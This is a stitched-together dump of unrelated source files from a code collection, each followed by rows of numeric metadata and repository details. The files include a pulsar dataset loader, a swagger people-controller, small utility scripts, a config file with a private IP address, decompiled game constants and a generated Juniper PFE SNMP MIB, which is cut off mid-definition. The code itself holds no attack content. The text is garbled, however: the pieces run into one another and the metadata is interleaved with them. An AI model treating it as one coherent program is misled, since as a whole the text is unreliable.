num_shards=1,
gen_kwargs={
'file_path': path,
}),
]
def _generate_examples(self, file_path):
"""Yields examples."""
with tf.io.gfile.GFile(os.path.join(file_path, "HTRU_2.csv"), "r") as csvfile:
features = [
"Mean of the integrated profile",
"Standard deviation of the integrated profile",
"Excess kurtosis of the integrated profile",
"Skewness of the integrated profile",
"Mean of the DM-SNR curve",
"Standard deviation of the DM-SNR curve",
"Excess kurtosis of the DM-SNR curve",
"Skewness of the DM-SNR curve",
"Class" # 0 for noise, 1 for pulsar
]
lines = csvfile.readlines()
for i in lines:
feature_lst = i.split(",")
length_increase = 0
for j in range(len(feature_lst)):
if j % (len(features) - 1) == 0 and j != 0:
temp = feature_lst[j + length_increase][0:]
feature_lst[j + length_increase] = feature_lst[j + length_increase][0]
feature_lst.insert(j + length_increase + 1, temp)
length_increase += 1
feature_dict = {}
for j in range(len(feature_lst)):
if j % len(features) == 0:
feature_dict = {}
feature_dict[features[j % len(features)]] = float(feature_lst[j])
elif j % len(features) < len(features) - 1:
feature_dict[features[j % len(features)]] = float(feature_lst[j])
elif j % len(features) == len(features) - 1:
yield j // len(features), {"Features" : feature_dict,
"Class" : int(feature_lst[j])}
| 56.523077 | 1,490 | 0.69951 | 1,006 | 7,348 | 5.050696 | 0.417495 | 0.017713 | 0.023617 | 0.034639 | 0.187168 | 0.163747 | 0.09565 | 0.05865 | 0.044479 | 0.044479 | 0 | 0.023439 | 0.221965 | 7,348 | 129 | 1,491 | 56.96124 | 0.865139 | 0.019325 | 0 | 0.100917 | 0 | 0.100917 | 0.645094 | 0.007376 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027523 | false | 0 | 0.055046 | 0.009174 | 0.119266 | 0.018349 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f726c946b28663f6039c3f5e99cf5aef3b6ee900 | 302 | py | Python | pyexcel/sheets/__init__.py | EnjoyLifeFund/macHighSierra-py36-pkgs | 5668b5785296b314ea1321057420bcd077dba9ea | [
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | 1 | 2022-01-25T22:52:58.000Z | 2022-01-25T22:52:58.000Z | pyexcel/sheets/__init__.py | EnjoyLifeFund/Debian_py36_packages | 1985d4c73fabd5f08f54b922e73a9306e09c77a5 | [
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null | pyexcel/sheets/__init__.py | EnjoyLifeFund/Debian_py36_packages | 1985d4c73fabd5f08f54b922e73a9306e09c77a5 | [
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null | """
pyexcel.sheets
~~~~~~~~~~~~~~~~~~~
Core functionality of pyexcel, data model
:copyright: (c) 2014-2017 by Onni Software Ltd.
:license: New BSD License, see LICENSE for more details
"""
# flake8: noqa
from .sheet import Sheet
from .matrix import Matrix, transpose, Row, Column
| 23.230769 | 59 | 0.652318 | 38 | 302 | 5.184211 | 0.815789 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0375 | 0.205298 | 302 | 12 | 60 | 25.166667 | 0.783333 | 0.649007 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
f7454057bbaa92fce7a7185a8a632a7cde34faf5 | 2,621 | py | Python | server/swagger_server/controllers/people_controller.py | fabric-testbed/core-api | b6f9df2b3cc4e9ab8782b9ef4de035f5f0644e46 | [
"MIT"
] | null | null | null | server/swagger_server/controllers/people_controller.py | fabric-testbed/core-api | b6f9df2b3cc4e9ab8782b9ef4de035f5f0644e46 | [
"MIT"
] | null | null | null | server/swagger_server/controllers/people_controller.py | fabric-testbed/core-api | b6f9df2b3cc4e9ab8782b9ef4de035f5f0644e46 | [
"MIT"
] | null | null | null | import connexion
import six
from swagger_server.models.inline_response200 import InlineResponse200 # noqa: E501
from swagger_server.models.inline_response2001 import InlineResponse2001 # noqa: E501
from swagger_server.models.inline_response2002 import InlineResponse2002 # noqa: E501
from swagger_server.models.model400_bad_request import Model400BadRequest # noqa: E501
from swagger_server.models.model401_unauthorized import Model401Unauthorized # noqa: E501
from swagger_server.models.model403_forbidden import Model403Forbidden # noqa: E501
from swagger_server.models.model404_not_found import Model404NotFound # noqa: E501
from swagger_server.models.model500_internal_server_error import Model500InternalServerError # noqa: E501
from swagger_server.models.payload_people_self_patch import PayloadPeopleSelfPatch # noqa: E501
from swagger_server import util
from swagger_server.response_code import people_controller as rc
def people_get(search=None, offset=None, limit=None): # noqa: E501
"""Search for FABRIC People
Search for FABRIC People by name or email # noqa: E501
:param search: search term applied
:type search: str
:param offset: number of items to skip before starting to collect the result set
:type offset: int
:param limit: maximum number of results to return per page (1 or more)
:type limit: int
:rtype: InlineResponse200
"""
return rc.people_get(search, offset, limit)
def people_uuid_get(uuid): # noqa: E501
"""Person details by UUID
Person details by UUID # noqa: E501
:param uuid: universally unique identifier
:type uuid: str
:rtype: InlineResponse2001
"""
return rc.people_uuid_get(uuid)
def people_uuid_self_get(uuid): # noqa: E501
"""Person details by UUID as self
Person details by UUID as self # noqa: E501
:param uuid: universally unique identifier
:type uuid: str
:rtype: InlineResponse2002
"""
return rc.people_uuid_self_get(uuid)
def people_uuid_update_patch(operation, uuid, body=None): # noqa: E501
"""Update Person details by UUID as self
Update Person details by UUID as self # noqa: E501
:param operation: operation to be performed
:type operation: str
:param uuid: universally unique identifier
:type uuid: str
:param body: Update People details by UUID as self
:type body: dict | bytes
:rtype: InlineResponse2002
"""
if connexion.request.is_json:
body = PayloadPeopleSelfPatch.from_dict(connexion.request.get_json()) # noqa: E501
return rc.people_uuid_update_patch(operation, uuid, body)
| 34.038961 | 106 | 0.7562 | 345 | 2,621 | 5.602899 | 0.284058 | 0.074496 | 0.096741 | 0.107087 | 0.41283 | 0.350233 | 0.250905 | 0.154165 | 0.094672 | 0.06208 | 0 | 0.056718 | 0.179321 | 2,621 | 76 | 107 | 34.486842 | 0.841934 | 0.432659 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.173913 | false | 0 | 0.565217 | 0 | 0.913043 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
f75a46be7b4ccea161a566cc25fd4d66b17cadaa | 78 | py | Python | 1/for.py | gdaPythonProjects/training2019-thursday | cd4d406a83f3ec914e136cec21d96988eb2ee2e9 | [
"MIT"
] | 5 | 2019-11-07T17:04:17.000Z | 2019-11-20T18:47:28.000Z | 1/for.py | gdaPythonProjects/training2019-thursday | cd4d406a83f3ec914e136cec21d96988eb2ee2e9 | [
"MIT"
] | null | null | null | 1/for.py | gdaPythonProjects/training2019-thursday | cd4d406a83f3ec914e136cec21d96988eb2ee2e9 | [
"MIT"
] | null | null | null | s = 0
for i in range(101):
s += i
print("Suma liczb od 1 do 100 to: ", s)
| 15.6 | 39 | 0.551282 | 18 | 78 | 2.388889 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145455 | 0.294872 | 78 | 4 | 40 | 19.5 | 0.636364 | 0 | 0 | 0 | 0 | 0 | 0.346154 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f76c97eef354283aecc2300158846f981c491d31 | 285 | py | Python | tms_ss/tms_ss_nfbed/scripts/config.py | robotpilot/ros_tms | 3d6b6579e89aa9cb216cd3cb6157fabc553c18f1 | [
"BSD-3-Clause"
] | 54 | 2015-01-06T06:58:28.000Z | 2021-05-02T07:49:37.000Z | tms_ss/tms_ss_nfbed/scripts/config.py | robotpilot/ros_tms | 3d6b6579e89aa9cb216cd3cb6157fabc553c18f1 | [
"BSD-3-Clause"
] | 114 | 2015-01-07T06:42:21.000Z | 2022-02-12T05:54:04.000Z | tms_ss/tms_ss_nfbed/scripts/config.py | robotpilot/ros_tms | 3d6b6579e89aa9cb216cd3cb6157fabc553c18f1 | [
"BSD-3-Clause"
] | 24 | 2015-03-27T08:35:59.000Z | 2020-06-08T13:05:31.000Z | #!/usr/bin/env python
# coding: utf-8
#
# Author: Kazuto Nakashima
# URL: https://github.com/kazuto1011
# Created: 2016-06-07
config = {
'server_IP': '192.168.4.170',
'PORT': 49952,
'xml_file': 'C:/Users/nemuriscan/Desktop/NemuriScanLog/NemuriScanStateInfo.xml'
}
| 21.923077 | 83 | 0.659649 | 37 | 285 | 5.027027 | 0.972973 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 0.164912 | 285 | 12 | 84 | 23.75 | 0.663866 | 0.42807 | 0 | 0 | 0 | 0 | 0.630573 | 0.414013 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f76f088ecf77e4f5aae9939484cc2d3998ac2b80 | 265 | py | Python | server/src/weaverbird/pipeline/steps/utils/validation.py | JeremyJacquemont/weaverbird | e04ab6f9c8381986ab71078e5199ece7a875e743 | [
"BSD-3-Clause"
] | 54 | 2019-11-20T15:07:39.000Z | 2022-03-24T22:13:51.000Z | server/src/weaverbird/pipeline/steps/utils/validation.py | JeremyJacquemont/weaverbird | e04ab6f9c8381986ab71078e5199ece7a875e743 | [
"BSD-3-Clause"
] | 786 | 2019-10-20T11:48:37.000Z | 2022-03-23T08:58:18.000Z | server/src/weaverbird/pipeline/steps/utils/validation.py | JeremyJacquemont/weaverbird | e04ab6f9c8381986ab71078e5199ece7a875e743 | [
"BSD-3-Clause"
] | 10 | 2019-11-21T10:16:16.000Z | 2022-03-21T10:34:06.000Z | from typing import Sequence
from weaverbird.exceptions import DuplicateColumnError
def validate_unique_columns(columns: Sequence[str]) -> Sequence[str]:
if len(set(columns)) < len(columns):
raise DuplicateColumnError
else:
return columns
| 24.090909 | 69 | 0.739623 | 29 | 265 | 6.689655 | 0.62069 | 0.113402 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.184906 | 265 | 10 | 70 | 26.5 | 0.898148 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
f78cbb9a7867ee0e39d3aab0ab1b6d463d2d9dea | 286 | py | Python | otp/uberdog/SpeedchatRelayGlobals.py | itsyaboyrocket/pirates | 6ca1e7d571c670b0d976f65e608235707b5737e3 | [
"BSD-3-Clause"
] | 3 | 2021-02-25T06:38:13.000Z | 2022-03-22T07:00:15.000Z | otp/uberdog/SpeedchatRelayGlobals.py | itsyaboyrocket/pirates | 6ca1e7d571c670b0d976f65e608235707b5737e3 | [
"BSD-3-Clause"
] | null | null | null | otp/uberdog/SpeedchatRelayGlobals.py | itsyaboyrocket/pirates | 6ca1e7d571c670b0d976f65e608235707b5737e3 | [
"BSD-3-Clause"
] | 1 | 2021-02-25T06:38:17.000Z | 2021-02-25T06:38:17.000Z | # uncompyle6 version 3.2.0
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]
# Embedded file name: otp.uberdog.SpeedchatRelayGlobals
NORMAL = 0
CUSTOM = 1
EMOTE = 2
PIRATES_QUEST = 3
TOONTOWN_QUEST = 4 | 31.777778 | 104 | 0.730769 | 50 | 286 | 4.14 | 0.8 | 0.028986 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.205761 | 0.15035 | 286 | 9 | 105 | 31.777778 | 0.646091 | 0.730769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f78d4b064232b8624891d6c13de1212ba11f915e | 28,680 | py | Python | pysnmp-with-texts/JUNIPER-PFE-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/JUNIPER-PFE-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/JUNIPER-PFE-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module JUNIPER-PFE-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/JUNIPER-PFE-MIB
# Produced by pysmi-0.3.4 at Wed May 1 14:00:43 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, ValueRangeConstraint, ConstraintsUnion, ValueSizeConstraint, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ValueRangeConstraint", "ConstraintsUnion", "ValueSizeConstraint", "SingleValueConstraint")
jnxPfeMibRoot, = mibBuilder.importSymbols("JUNIPER-SMI", "jnxPfeMibRoot")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
TimeTicks, IpAddress, Integer32, ObjectIdentity, ModuleIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier, Counter64, Counter32, NotificationType, Unsigned32, Gauge32, iso, Bits = mibBuilder.importSymbols("SNMPv2-SMI", "TimeTicks", "IpAddress", "Integer32", "ObjectIdentity", "ModuleIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "MibIdentifier", "Counter64", "Counter32", "NotificationType", "Unsigned32", "Gauge32", "iso", "Bits")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
jnxPfeMib = ModuleIdentity((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1))
jnxPfeMib.setRevisions(('2014-11-14 00:00', '2014-03-12 00:00', '2011-09-09 00:00', '2010-02-07 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: jnxPfeMib.setRevisionsDescriptions(('Added jnxPfeMemoryTrapVars and jnxPfeMemoryNotifications.', 'Added new Table jnxPfeNotifyGlParAccSec which counts notifications for the packets parsed/processed by access-security.', 'Added new Table jnxPfeMemoryErrorsTable which gives parity and ecc errors. Added new Trap pfeMemoryErrors', 'Added new notification types.',))
if mibBuilder.loadTexts: jnxPfeMib.setLastUpdated('201109220000Z')
if mibBuilder.loadTexts: jnxPfeMib.setOrganization('Juniper Networks, Inc.')
if mibBuilder.loadTexts: jnxPfeMib.setContactInfo(' Juniper Technical Assistance Center Juniper Networks, Inc. 1194 N. Mathilda Avenue Sunnyvale, CA 94089 E-mail: support@juniper.net')
if mibBuilder.loadTexts: jnxPfeMib.setDescription('The MIB provides PFE specific data.')
class JnxPfeMemoryTypeEnum(TextualConvention, Integer32):
description = 'PFE memory type, nh (1), fw (2), encap (3)'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3))
namedValues = NamedValues(("nh", 1), ("fw", 2), ("encap", 3))
jnxPfeNotification = MibIdentifier((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1))
jnxPfeNotifyGlTable = MibTable((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1), )
if mibBuilder.loadTexts: jnxPfeNotifyGlTable.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlTable.setDescription('This table provides global PFE notification statistics.')
jnxPfeNotifyGlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1), ).setIndexNames((0, "JUNIPER-PFE-MIB", "jnxPfeNotifyGlSlot"))
if mibBuilder.loadTexts: jnxPfeNotifyGlEntry.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlEntry.setDescription('')
jnxPfeNotifyGlSlot = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647)))
if mibBuilder.loadTexts: jnxPfeNotifyGlSlot.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlSlot.setDescription('The PFE slot number for this set of global PFE notification statistics.')
jnxPfeNotifyGlParsed = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlParsed.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlParsed.setDescription('Count of notifications reported by the routing chip.')
jnxPfeNotifyGlAged = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlAged.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlAged.setDescription('Count of notifications that are dropped due to the fact that the they have been in the system for too long and hence not valid anymore.')
jnxPfeNotifyGlCorrupt = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlCorrupt.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlCorrupt.setDescription('Count of notifications dropped due to the fact that they have an invalid notification result format. This counter is valid for Internet Processor-I and Internet Processor-II only.')
jnxPfeNotifyGlIllegal = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlIllegal.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlIllegal.setDescription('Count of notifications dropped due to the fact that they have an illegal notification type.')
jnxPfeNotifyGlSample = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlSample.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlSample.setDescription('Count of sample notifications reported by the routing chip.')
jnxPfeNotifyGlGiants = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlGiants.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlGiants.setDescription('Count of notifications dropped that are larger than the supported DMA size.')
jnxPfeNotifyGlTtlExceeded = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlTtlExceeded.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlTtlExceeded.setDescription('Count of options/TTL-expired notifications that need to be sent to service interfaces as transit packets. This counter is valid for Internet Processor-I and Internet Processor-II only.')
jnxPfeNotifyGlTtlExcErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlTtlExcErrors.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlTtlExcErrors.setDescription('Count of options/TTL-expired packet notifications that could not be sent as transit packets because the output interface could not be determined. This counter is valid for Internet Processor-I and Internet Processor-II only.')
jnxPfeNotifyGlSvcOptAsp = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlSvcOptAsp.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlSvcOptAsp.setDescription('Count of IP options packets that are sent out to a Services PIC.')
jnxPfeNotifyGlSvcOptRe = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlSvcOptRe.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlSvcOptRe.setDescription('Count of IP options packets that are sent out to the Routing Engine.')
jnxPfeNotifyGlPostSvcOptOut = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 12), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlPostSvcOptOut.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlPostSvcOptOut.setDescription('Count of notifications that were re-injected by the services PIC after it had processed the associated packets. These notifications now need to be forwarded out to their actual destination. This counter is valid for Internet Processor-I and Internet Processor-II only.')
jnxPfeNotifyGlOptTtlExp = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 13), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlOptTtlExp.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlOptTtlExp.setDescription('Count of TTL-expired transit packets.')
jnxPfeNotifyGlDiscSample = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 14), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlDiscSample.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlDiscSample.setDescription('Count of sample notifications that are dropped as they refer to discarded packets in PFE.')
jnxPfeNotifyGlRateLimited = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 15), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlRateLimited.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlRateLimited.setDescription('Count of notifications ignored because of PFE software throttling.')
jnxPfeNotifyGlPktGetFails = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 16), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlPktGetFails.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlPktGetFails.setDescription('Count of notifications where we could not allocate memory for DMA.')
jnxPfeNotifyGlDmaFails = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 17), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlDmaFails.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlDmaFails.setDescription('Count of notifications where the DMA of associated packets failed for miscellaneous reasons. Valid for T-series Internet Processor only.')
jnxPfeNotifyGlDmaTotals = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 18), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlDmaTotals.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlDmaTotals.setDescription('Count of notifications for which the packet DMA completed. Valid for T-series Internet Processor only.')
jnxPfeNotifyGlUnknowns = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 19), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlUnknowns.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlUnknowns.setDescription('Count of notifications that could not be resolved to a known next hop destination. Valid for T-series Internet Processor only.')
jnxPfeNotifyGlParAccSec = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 1, 1, 20), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyGlParAccSec.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyGlParAccSec.setDescription('Count of notifications for the packets parsed/processed by access-security.')
jnxPfeNotifyTypeTable = MibTable((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 2), )
if mibBuilder.loadTexts: jnxPfeNotifyTypeTable.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyTypeTable.setDescription('This provides type-specific PFE notification stats')
jnxPfeNotifyTypeEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 2, 1), ).setIndexNames((0, "JUNIPER-PFE-MIB", "jnxPfeNotifyGlSlot"), (0, "JUNIPER-PFE-MIB", "jnxPfeNotifyTypeId"))
if mibBuilder.loadTexts: jnxPfeNotifyTypeEntry.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyTypeEntry.setDescription('')
jnxPfeNotifyTypeId = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 2, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14))).clone(namedValues=NamedValues(("illegal", 1), ("unclassified", 2), ("option", 3), ("nextHop", 4), ("discard", 5), ("sample", 6), ("redirect", 7), ("dontFragment", 8), ("cfdf", 9), ("poison", 10), ("unknown", 11), ("specialMemPkt", 12), ("autoConfig", 13), ("reject", 14))))
if mibBuilder.loadTexts: jnxPfeNotifyTypeId.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyTypeId.setDescription("This identifies the PFE notification type for this row's stats. Below is a description of each notification type: 1. illegal Packets with invalid notification type. 2. unclassified Packets that did not have a key lookup performed on them. 3. option Packets which have L3 options present. 4. nextHop Packets that are destined to the host. 5. discard Used when a discarded packet is sent to the route processor. 6. sample Unused. 7. redirect This is used when a packet is being sent out on the interface it came in on. 8. dontFragment This is used that a packet needs to be fragmented but the DF (don't fragment) bit is set. 9. cfdf When an MTU exceeded indication is triggered by the CF chip and the packet has DF (don't fragment) set. 10. poison Packets that resolved to a poisoned next hop index. 11. unknown Packets of unknown notification type. 12. specialMemPkt Packets with special memory pkt type notification used in diagnostics. 13. autoconfig Packets with autoconfig PFE notification type used for dynamic VLANs. 14. reject Packets of reject PFE notification type.")
jnxPfeNotifyTypeDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 64))).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyTypeDescr.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyTypeDescr.setDescription('The description of the Pfe Notification type for this entry.')
jnxPfeNotifyTypeParsed = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 2, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxPfeNotifyTypeParsed.setStatus('current')
if mibBuilder.loadTexts: jnxPfeNotifyTypeParsed.setDescription('Count of successful parsing of notifications.')
jnxPfeNotifyTypeInput = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 44, 1, 1, 2, 1, 4), Counter32()).setMaxAccess("readonly")
